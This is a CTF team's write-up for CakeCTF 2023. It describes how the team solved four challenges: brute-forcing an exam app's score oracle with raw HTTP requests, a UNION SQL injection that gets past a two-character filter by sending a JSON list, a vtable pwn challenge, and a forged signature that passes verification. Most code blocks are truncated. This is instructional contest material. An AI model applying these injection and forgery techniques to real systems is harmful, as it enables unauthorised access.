Team Name:WAN
Rank:142/729
Link:https://2023.cakectf.com/teams/2247781930/
Before all
While I was at my school Feild Day, my team members(Aukro & Naup) in WAN
invited me to participate in this CTF XD.
Beside the Welcome and Survey challenges, I solved two web challenges and Naup solved a pwn challenge this time, not bad though.
Write up
TOWFL
Solver : Whale120
An exam web application which would generate some strange sentences with unknow characters every time and you have to get flag by getting a full mark on it.
There are a hundred strange problems, after a try on this application with Burp Suite, I found out two key points:
- The submition would be post to path
/api/submit
and the submission result can be get by path:/api/score
. The statements would be the same every time if the sessions are the same. - It would return your score every time.
So my solution is to enumerate the answer of a problem every time by sending packages with the same session and check whether it’s right by the increase/decrease of score.
about 400 tries, I finally get flag!!!
Finall packets: - Submit
1
2
3
4
5
6
7
8
9
10
11
12
13
14POST /api/submit HTTP/1.1
Host: towfl.2023.cakectf.com:8888
Content-Length: 221
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://towfl.2023.cakectf.com:8888
Referer: http://towfl.2023.cakectf.com:8888/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: session=.eJwFwQkNgDAMAEAvVdB3HbjptwQNBO_cvTBPww2G0TaaNUzJxcgdjbKuLVa4InJ8nDJaSQ-SrLbaV7q6Sh2E7wcTBRSv.ZU8oLA.Eg6KzOfgQ2jRkpXYuYEZaJp-mXw
Connection: close
[[1,0,3,1,1,3,3,0,1,0],[0,3,3,0,1,3,0,0,0,1],[2,1,3,3,0,3,3,2,2,1],[1,2,2,0,2,0,2,2,2,2],[2,3,2,2,0,3,3,1,2,3],[2,0,0,3,2,1,0,0,0,0],[3,1,0,1,0,0,1,2,2,2],[0,2,3,2,3,3,0,0,0,2],[2,2,2,0,0,0,2,0,2,1],[3,1,2,2,0,1,1,2,3,1]] - Get score Finall Result:
1
2
3
4
5
6
7
8
9GET /api/score HTTP/1.1
Host: towfl.2023.cakectf.com:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36
Accept: */*
Referer: http://towfl.2023.cakectf.com:8888/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: session=.eJwFwQkNgDAMAEAvVdB3HbjptwQNBO_cvTBPww2G0TaaNUzJxcgdjbKuLVa4InJ8nDJaSQ-SrLbaV7q6Sh2E7wcTBRSv.ZU8oLA.Eg6KzOfgQ2jRkpXYuYEZaJp-mXw
Connection: closeMy arms were almost broken by brute forcing through this…1
2
3
4
5
6
7
8
9
10HTTP/1.1 200 OK
Server: nginx/1.21.6
Date: Sat, 11 Nov 2023 07:37:40 GMT
Content-Type: application/json
Content-Length: 112
Connection: close
Vary: Cookie
Set-Cookie: session=; Expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; HttpOnly; Path=/
{"data":{"flag":"\"CakeCTF{b3_c4ut10us_1f_s3ss10n_1s_cl13nt_s1d3_0r_s3rv3r_s1d3}\"","score":100},"status":"ok"}
Country DB
Solver : Whale120
An simple web application use to search country ID by input two charaters every time.
Its backend is setup by sqlite3 and python flask, and it would filter user input by this:
1 | def api_search(): |
Search query:
1 | def db_search(code): |
And I was stucked at here because I was thicking about SQL Injection with two characters
After about 30 minutes, I tried to send packages like this while I was testing sqlite and list container on python:
1 | POST /api/search HTTP/1.1 |
And there was a 500 error code but not 400, which means that this can passed the length filter!!!
So I constructed my payload into this:
1 | POST /api/search HTTP/1.1 |
Because python would consider the json of parameter code
a list with legth 2, although sqlite can’t accept a list like object, but it can be a string if I add a annotation --
in the middle of my payload. Base on these, this UNION SQL Injection payload is effective!
Finall Request:
1 | HTTP/1.1 200 OK |
vtable4b
Solver : Naup
C++ pwn with vtable.
1 | from pwn import * |
simple signature
Solver : No one :<
server.py
1 | import os |
I was stucking on cauculate the values of x or u or r, but not thinking about bypass the verification QAQ.
And I found out the solution after contest, which I change the signature value s into pow(2, (h(m)-1)*inverse(w, p-1), p)
and signature value t into pow(2, inverse(-v, p-1), p)
, this can easily bypass the verification without knowing the value of every keys🙃.
Finall Result:
1 | p = 10647372643515294188613364246580714333899035615886461920553204897512120035419331572653490127930105043004421946163174341296039760125995963183071647227964223 |
After all
We have only three members in our team and we aren’t as professional as other teams, so a good experience and performance, keep going on!